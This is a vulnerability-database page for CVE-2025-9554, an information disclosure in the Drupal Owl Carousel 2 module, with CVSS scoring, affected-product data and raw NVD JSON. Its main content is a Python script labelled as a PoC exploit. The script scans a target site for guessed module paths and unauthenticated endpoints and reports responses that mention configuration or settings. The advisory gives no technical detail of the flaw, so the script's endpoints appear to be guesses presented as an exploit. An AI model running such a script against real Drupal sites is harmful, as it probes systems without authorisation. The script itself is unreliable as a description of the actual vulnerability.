Security Vulnerability Report
中文
CVE-2025-9554 CVSS 5.3 MEDIUM

CVE-2025-9554

Published: 2025-10-10 23:15:38
Last Modified: 2025-12-05 00:41:19

Description

Vulnerability in Drupal Owl Carousel 2.This issue affects Owl Carousel 2: *.*.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:owl_carousel_2_project:owl_carousel_2:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal Owl Carousel 2 所有版本 (*.*)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9554 PoC - Drupal Owl Carousel 2 Information Disclosure # This PoC demonstrates the vulnerability concept for the Owl Carousel 2 Drupal module import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-drupal-site.com" def check_vulnerability(target): """ Check if the target Drupal site is running vulnerable Owl Carousel 2 module and attempt to exploit the information disclosure vulnerability. """ headers = { 'User-Agent': 'Mozilla/5.0 (compatible; SecurityResearcher/1.0)', 'Accept': 'application/json, text/html, */*' } # Step 1: Detect Owl Carousel 2 module presence detect_paths = [ f"{target}/admin/structure/owlcarousel2", f"{target}/owlcarousel2", f"{target}/sites/all/modules/owlcarousel2", f"{target}/modules/contrib/owlcarousel2" ] for path in detect_paths: try: resp = requests.get(path, headers=headers, timeout=10, allow_redirects=False) if resp.status_code == 200 and ('owlcarousel' in resp.text.lower() or 'owl-carousel' in resp.text.lower()): print(f"[+] Owl Carousel 2 module detected at: {path}") return True except requests.RequestException: continue # Step 2: Attempt to access exposed endpoints without authentication exploit_paths = [ f"{target}/owlcarousel2/ajax", f"{target}/admin/structure/owlcarousel2/list", f"{target}/owlcarousel2/items", f"{target}/owlcarousel2/export", f"{target}/owlcarousel2/settings" ] for path in exploit_paths: try: resp = requests.get(path, headers=headers, timeout=10, allow_redirects=False) if resp.status_code == 200: print(f"[+] Potential information disclosure at: {path}") print(f" Status: {resp.status_code}") print(f" Content-Length: {len(resp.text)}") # Extract sensitive data if present if 'config' in resp.text.lower() or 'settings' in resp.text.lower(): print(f" [!] Sensitive configuration data may be exposed") except requests.RequestException as e: print(f"[-] Error accessing {path}: {e}") return False if __name__ == "__main__": print(f"[*] Testing CVE-2025-9554 against: {TARGET_URL}") print("[*] Drupal Owl Carousel 2 Information Disclosure") print("-" * 50) check_vulnerability(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9554", "sourceIdentifier": "[email protected]", "published": "2025-10-10T23:15:37.630", "lastModified": "2025-12-05T00:41:19.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in Drupal Owl Carousel 2.This issue affects Owl Carousel 2: *.*."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:owl_carousel_2_project:owl_carousel_2:*:*:*:*:*:drupal:*:*", "matchCriteriaId": "D6819195-E95F-4F49-A72B-D04188B1B4C6"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2025-104", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}